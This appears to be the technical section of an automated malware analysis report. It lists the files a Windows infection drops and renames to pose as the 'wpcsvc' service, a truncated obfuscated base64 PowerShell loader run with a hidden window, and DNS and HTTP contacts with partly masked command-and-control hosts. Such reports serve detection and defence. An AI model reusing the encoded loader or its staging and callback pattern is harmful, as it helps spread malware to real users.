Technical Information
- 'wpcsvc' "%WINDIR%\SysWOW64\vds_ps\wpcsvc.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAGMAaQB6AHIAcQBxAD0AKAAnAFQAZQAnACsAJwA4AHUAagBtAGsAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBwAFwAbwBGAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\office2019\qklap6og.exe
- %WINDIR%\syswow64\vds_ps\wpcsvc.exe
- from %TEMP%\office2019\qklap6og.exe to %WINDIR%\syswow64\vds_ps\wpcsvc.exe
- '18#.#0.61.163':443
- http://so#####nestecnicom.com/cdrom/onP/
- http://18#.##.61.163:443/Q5008Z8kv0HgBZpUFe/ via 18#.#0.61.163
- DNS ASK tr#####rtyescrow.com
- DNS ASK so#####nestecnicom.com
- '%TEMP%\office2019\qklap6og.exe'
- '%WINDIR%\syswow64\vds_ps\wpcsvc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAGMAaQB6AHIAcQBxAD0AKAAnAFQAZQAnACsAJwA4AHUAagBtAGsAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBwAFwAbwBGAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (with hidden window)